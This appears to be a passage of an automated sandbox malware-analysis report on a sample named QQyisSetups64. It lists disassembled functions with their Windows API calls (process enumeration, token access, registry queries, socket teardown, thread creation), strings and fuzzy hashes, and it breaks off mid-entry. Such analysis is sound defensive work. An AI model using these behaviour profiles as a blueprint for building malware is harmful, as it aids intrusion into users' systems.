GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0378BB83

Strings

%d min, xrefs: 0378BB60

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
String ID: %d min
API String ID: 3754759880-1947832151
Opcode ID: d250d37e4f62c8a01ad23a3c39bdedf3c56cec65976d9395c341ebf4f77586b8
Instruction ID: bda4eeecd486293b0371f77ceabc9485dd7324fad19965c6990a4520da81ee89
Opcode Fuzzy Hash: d250d37e4f62c8a01ad23a3c39bdedf3c56cec65976d9395c341ebf4f77586b8
Instruction Fuzzy Hash: 1941A6B5940218AFDB10EFA4DC88E9FBBB8EF88710F088555F9099B355D7749A04CBE1

Function 03786910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(453DC9E3,00000000,00000000,75A373E0,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786938
OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786947
OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786960
CloseHandle.KERNEL32(00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 0378696B
SysStringLen.OLEAUT32(00000000), ref: 037869BE
SysStringLen.OLEAUT32(00000000), ref: 037869CC
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,037A10DB,000000FF), ref: 03786A2E
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,037A10DB,000000FF), ref: 03786A34

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseHandleProcess$OpenString$CurrentToken
String ID:
API String ID: 429299433-0
Opcode ID: fd3ee3900cd2190015158c90cacd5c730617a97c5f7f99ad7a4f3b634e1c553c
Instruction ID: a2d55288b154a7e3044868a7fe420ef5ec0adc2c5aea218476f08fd242103684
Opcode Fuzzy Hash: fd3ee3900cd2190015158c90cacd5c730617a97c5f7f99ad7a4f3b634e1c553c
Instruction Fuzzy Hash: 0C41DCB2D80618AFDB10EFA8CC44AAEF7F8FB44710F15462AEA15E7241D7755901C7A0

Function 03786D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03786DD9
RegOpenKeyExW.KERNEL32(80000001,037A5164,00000000,00020019,75A373E0), ref: 03786DFC
RegQueryValueExW.KERNEL32(75A373E0,GROUP,00000000,00000001,?,00000208), ref: 03786E4A
lstrcmpW.KERNEL32(?,037A5148), ref: 03786E60
lstrcpyW.KERNEL32(037856EA,?), ref: 03786E72

Strings

GROUP, xrefs: 03786E42

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: OpenQueryValue_memsetlstrcmplstrcpy
String ID: GROUP
API String ID: 2102619503-2593425013
Opcode ID: 23c7617a6251003a185c9c437860abe9e78686d0e4a1302327dc5f56e1910792
Instruction ID: 7abc5498526a6d25e37066fc9cfa6323402eaa7f8d821a5d6a5c363e9e6c794b
Opcode Fuzzy Hash: 23c7617a6251003a185c9c437860abe9e78686d0e4a1302327dc5f56e1910792
Instruction Fuzzy Hash: 39316371940319BBDB20EF94ED89B9EB7B8FF48710F104699E519A6280DB74AA84CF50

Function 0378FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0378FA4E
__calloc_crt.LIBCMT ref: 0378FA5A
__getptd.LIBCMT ref: 0378FA67
CreateThread.KERNEL32(00000000,00000000,0378F9C4,00000000,00000000,0378E003), ref: 0378FA9E
GetLastError.KERNEL32(?,00000000,?,?,0378E003,00000000,00000000,03785F40,00000000,00000000,00000000), ref: 0378FAA8
_free.LIBCMT ref: 0378FAB1
__dosmaperr.LIBCMT ref: 0378FABC

Part of subcall function 0378F91B: __getptd_noexit.LIBCMT ref: 0378F91B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: b1c2933ca314bda0910a8fa8481ab82bc200bbe203a1f6efa8c14f07aa137a09
Instruction ID: 1e8ac946819108fac79966d9c34278b5df337d9a6d62fd196502b01d29b97dc1
Opcode Fuzzy Hash: b1c2933ca314bda0910a8fa8481ab82bc200bbe203a1f6efa8c14f07aa137a09
Instruction Fuzzy Hash: BE11083A24070ABFEB10FFA5FC84D9B37D8DF46A707144526F914CA180DB71D8028B61

Function 02C8721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 02C87240
__calloc_crt.LIBCMT ref: 02C8724C
__getptd.LIBCMT ref: 02C87259
CreateThread.KERNEL32(?,?,02C871B6,00000000,?,?), ref: 02C87290
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02C8729A
_free.LIBCMT ref: 02C872A3
__dosmaperr.LIBCMT ref: 02C872AE

Part of subcall function 02C8710D: __getptd_noexit.LIBCMT ref: 02C8710D

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 6e30613b1aeb001396528c79616f7fd11f3a422246e395731b60d4d3210bcb83
Instruction ID: 7455e438b98cbd62e227d06ab6755b135b06b89a3b3b23b3a3e989c6d88234f8
Opcode Fuzzy Hash: 6e30613b1aeb001396528c79616f7fd11f3a422246e395731b60d4d3210bcb83
Instruction Fuzzy Hash: F3110836100706EFDB11BFA5DC44EABB7E9EF4137CB208429F91886150EB31C5149AA1

Function 03787410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03787523), ref: 0378743D
GetProcAddress.KERNEL32(00000000), ref: 03787444
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03787523), ref: 03787452
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03787523), ref: 0378745A

Strings

kernel32.dll, xrefs: 0378741D
GetNativeSystemInfo, xrefs: 03787418

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3433367815-192647395
Opcode ID: 6556520ffcfe1c3b5f64b303d2d2c3e41c2cc5bd1bcc15f78cdf8fdbc82a32a4
Instruction ID: d159264e15ed90618a08709e84ab45ccc919d48da86fd0e7bb667ad4be5993f6
Opcode Fuzzy Hash: 6556520ffcfe1c3b5f64b303d2d2c3e41c2cc5bd1bcc15f78cdf8fdbc82a32a4
Instruction Fuzzy Hash: 42014FB0D0420D9FCF54EFB8D9446AEBBF5EB48200F5445A9D95EE3241EA3A8A00CF61

Function 0378F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0378F9CA

Part of subcall function 03793CA0: TlsGetValue.KERNEL32(00000000,03793DF9,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000), ref: 03793CA9
Part of subcall function 03793CA0: DecodePointer.KERNEL32(?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06,0000000D), ref: 03793CBB
Part of subcall function 03793CA0: TlsSetValue.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793CCA

___fls_getvalue@4.LIBCMT ref: 0378F9D5

Part of subcall function 03793C80: TlsGetValue.KERNEL32(?,?,0378F9DA,00000000), ref: 03793C8E

___fls_setvalue@8.LIBCMT ref: 0378F9E8

Part of subcall function 03793CD4: DecodePointer.KERNEL32(?,?,?,0378F9ED,00000000,?,00000000), ref: 03793CE5

GetLastError.KERNEL32(00000000,?,00000000), ref: 0378F9F1
ExitThread.KERNEL32 ref: 0378F9F8
GetCurrentThreadId.KERNEL32 ref: 0378F9FE
__freefls@4.LIBCMT ref: 0378FA1E

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: b71b6f1e2f9624e562b831b7a23a8fe5f51c53bacac09f34f92ec508bd51c052
Instruction ID: 356b352b6a76ea656dc461b5cae1e46d884359ad90229d21b0d470495d86210f
Opcode Fuzzy Hash: b71b6f1e2f9624e562b831b7a23a8fe5f51c53bacac09f34f92ec508bd51c052
Instruction Fuzzy Hash: E2F0967C640B00BFEB08FF70E94C84E7BECAF8A2503218659E909CF241DA34D442CB91

Function 02C871B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 02C871BC

Part of subcall function 02C89754: TlsGetValue.KERNEL32(00000000,02C898AD,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000), ref: 02C8975D
Part of subcall function 02C89754: DecodePointer.KERNEL32(?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA,0000000D), ref: 02C8976F
Part of subcall function 02C89754: TlsSetValue.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C8977E

___fls_getvalue@4.LIBCMT ref: 02C871C7

Part of subcall function 02C89734: TlsGetValue.KERNEL32(?,?,02C871CC,00000000), ref: 02C89742

___fls_setvalue@8.LIBCMT ref: 02C871DA

Part of subcall function 02C89788: DecodePointer.KERNEL32(?,?,?,02C871DF,00000000,?,00000000), ref: 02C89799

GetLastError.KERNEL32(00000000,?,00000000), ref: 02C871E3
ExitThread.KERNEL32 ref: 02C871EA
GetCurrentThreadId.KERNEL32 ref: 02C871F0
__freefls@4.LIBCMT ref: 02C87210

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 9b8af520ad19124ba38e53c11f001401c9a6aabc38dff8bbac251030a430b54a
Instruction ID: ed780a37559c5b08afba14007551665b7a093517ebed2b4f605abcfb47ee85af
Opcode Fuzzy Hash: 9b8af520ad19124ba38e53c11f001401c9a6aabc38dff8bbac251030a430b54a
Instruction Fuzzy Hash: CDF03078400644ABC704BFB1CD4C96EBBAAAF8935C724CD58E90987315EB38D446EFA1

Function 03786050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0378607C
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03786088
Process32FirstW.KERNEL32(00000000,00000000), ref: 037860B9
Process32NextW.KERNEL32(00000000,0000022C), ref: 0378610F
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03786116

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
String ID:
API String ID: 2526126748-0
Opcode ID: 28e1c5a7a5c9f1ef4f35e941f3a7581f0789edea53530db2d351b7ef88f4db3b
Instruction ID: 2b43b2c9eb2b66e70f91d2b62c66f8278dc898ba21a9585ae0f66305995ed997
Opcode Fuzzy Hash: 28e1c5a7a5c9f1ef4f35e941f3a7581f0789edea53530db2d351b7ef88f4db3b
Instruction Fuzzy Hash: 6521E731A40118ABDB20FF64EC59BEAB369EF54310F144699DE09971C1EB359A01C650

Function 02C832E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C832F1
Sleep.KERNEL32(00000258), ref: 02C832FE
InterlockedExchange.KERNEL32(?,00000000), ref: 02C83306
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C83312
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C8331A
Sleep.KERNEL32(0000012C), ref: 02C8332B

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
String ID:
API String ID: 3137405945-0
Opcode ID: 2a24671d5a0eedda63eac927461c5e0528f8832189fe705133b786f7c2308fbd
Instruction ID: 0d0bcc9e2e2da8971b41510eb78df876bbacc41737d255ed13262e24e2799031
Opcode Fuzzy Hash: 2a24671d5a0eedda63eac927461c5e0528f8832189fe705133b786f7c2308fbd
Instruction Fuzzy Hash: B0F082722443046BD610ABA9DC88F46F3A8AF85370B204B09F221876D0CAB0E8018BA0

Function 03786690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0378669B
CoCreateInstance.OLE32(037A46FC,00000000,00000001,037A471C,?,?,?,?,?,?,?,?,?,?,0378588A), ref: 037866B2
SysFreeString.OLEAUT32(?), ref: 0378674C
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0378588A), ref: 0378677D

Strings

FriendlyName, xrefs: 0378673B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateFreeInitializeInstanceStringUninitialize
String ID: FriendlyName
API String ID: 841178590-3623505368
Opcode ID: b9387d0a14064fa39034558b0c6eedb9b871b8dfe77b78b83a824ba8faac73ba
Instruction ID: 1cf2e890297a770e6019c859152f4c0fc29ba6fceca90fbbd8e680c6694e0fa9
Opcode Fuzzy Hash: b9387d0a14064fa39034558b0c6eedb9b871b8dfe77b78b83a824ba8faac73ba
Instruction Fuzzy Hash: E8314A75740609AFDB00EB99DC80EAEB7B9EFC9704F148598E604EB255DA71ED01CBA0

Function 0378F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0378F721

Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8

std::exception::exception.LIBCMT ref: 0378F756
std::exception::exception.LIBCMT ref: 0378F770
__CxxThrowException@8.LIBCMT ref: 0378F781

Strings

bad allocation, xrefs: 0378F74F

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: 9663dc724662003ae0a10da5014a338cd140ab5cd59f81fe9572a0d8f89a7906
Instruction ID: ac27d5149ec15d381865cd034fcd75a8f45ec8381cb7317aab1130e6e2da36c3
Opcode Fuzzy Hash: 9663dc724662003ae0a10da5014a338cd140ab5cd59f81fe9572a0d8f89a7906
Instruction Fuzzy Hash: 94F02D75540B096FEB00FB28FC28A5E77B9AF80244F58415DD410DA091DB708540CF44

Function 03782D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03782D5C
CancelIo.KERNEL32(?), ref: 03782D66
InterlockedExchange.KERNEL32(00000000,00000000), ref: 03782D6F
closesocket.WS2_32(?), ref: 03782D79
SetEvent.KERNEL32(00000001), ref: 03782D83

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 6f01b3fd5e5b3ce29ee78bcf5953622a9f5e8eb977f9e25e845ae96d3a72e30a
Instruction ID: 8b1903504dcbf2695bd5b4e8e766de10d57e56a769b6372f330afb9b93d68af9
Opcode Fuzzy Hash: 6f01b3fd5e5b3ce29ee78bcf5953622a9f5e8eb977f9e25e845ae96d3a72e30a
Instruction Fuzzy Hash: BAF03C76100B04BFD224AF54DD49B6677F8BB89B11F104A1DFA9296685C6B4B9048BA0

Function 02C82D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02C82D3C
CancelIo.KERNEL32(?), ref: 02C82D46
InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C82D4F
closesocket.WS2_32(?), ref: 02C82D59
SetEvent.KERNEL32(00000001), ref: 02C82D63

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: d3940892d9e0adad8026f69c2506db9f71a5c152f2df3103f30244bb128282ca
Instruction ID: 3096f0f6a651d6c2e15c6fd99428bb83ad3a915d19296a48e5a305d79687b6ff
Opcode Fuzzy Hash: d3940892d9e0adad8026f69c2506db9f71a5c152f2df3103f30244bb128282ca
Instruction Fuzzy Hash: 5DF08C76540700ABC2209B54DC4DB5677B8BB89B51F504B09F68292680C7B0B904CBE0

Function 02C86F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C86F31

Part of subcall function 02C86E83: __FF_MSGBANNER.LIBCMT ref: 02C86E9C
Part of subcall function 02C86E83: __NMSG_WRITE.LIBCMT ref: 02C86EA3
Part of subcall function 02C86E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86EC8

std::exception::exception.LIBCMT ref: 02C86F66
std::exception::exception.LIBCMT ref: 02C86F80
__CxxThrowException@8.LIBCMT ref: 02C86F91

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 2d3f8164d5fcca68955db4c98dbc25dd2ae2304de413f105d4429e21e0a54b0c
Instruction ID: 9484efe87c239bc30c1eba3b66be39e413c4bd6ea8c0532cc1dc93cfca87c747
Opcode Fuzzy Hash: 2d3f8164d5fcca68955db4c98dbc25dd2ae2304de413f105d4429e21e0a54b0c
Instruction Fuzzy Hash: B9F02871900109AAEF04FBA4D808BAEBBAFAB4171CF348019E408A6590DBB2CB45DF41

Function 03783160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0378316B
InterlockedExchange.KERNEL32(?,00000001), ref: 03783183
GetCurrentThreadId.KERNEL32 ref: 0378322F

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CurrentThread$ExchangeInterlocked
String ID:
API String ID: 4033114805-0
Opcode ID: c9972a2c98bf936c6cba85e2e537b9e4dc2f0493dbd781c7a3319555dc11a8d9
Instruction ID: bf0a7373889a5fdb2591322e91093f3adb3b34a8d2db6e99a63ead6a8fc29929
Opcode Fuzzy Hash: c9972a2c98bf936c6cba85e2e537b9e4dc2f0493dbd781c7a3319555dc11a8d9
Instruction Fuzzy Hash: 6C31A078640A02DFE714EF69C884A66B3E9FF44B14B10C56DE81ACB615D731F842CB90

Function 037811B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 037811E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03781226
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03781255

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 9dca776b82701631fc4824af2b7afc641e8702b3b7753bbc820635a4262b4884
Instruction ID: d73c0a789632f410615ec1536d6676f791cb160fdbcb78d928512ffbfb8ceafe
Opcode Fuzzy Hash: 9dca776b82701631fc4824af2b7afc641e8702b3b7753bbc820635a4262b4884
Instruction Fuzzy Hash: 45218E71B40709ABDB14EFA9E845B6EBBF8EF84715F4085A9E849A2640E630A8108B40

Function 02C811B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 02C811E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C81226
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C81255

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 47c8ffbd1eabab4a07809aa283b527b8c7ae6292caebe66c3a34285be6ce2299
Instruction ID: 78bcbd0ea851dac55e34e3ddf844db45c22bad47f967d7567ed2c9b6c429438d
Opcode Fuzzy Hash: 47c8ffbd1eabab4a07809aa283b527b8c7ae6292caebe66c3a34285be6ce2299
Instruction Fuzzy Hash: 2621C270E403099BDB14AFA9DC45B6EF7F4EF40709F00C5ADE849E2640E670A9108B50

Function 03781100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0378112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0378115F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03781192

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

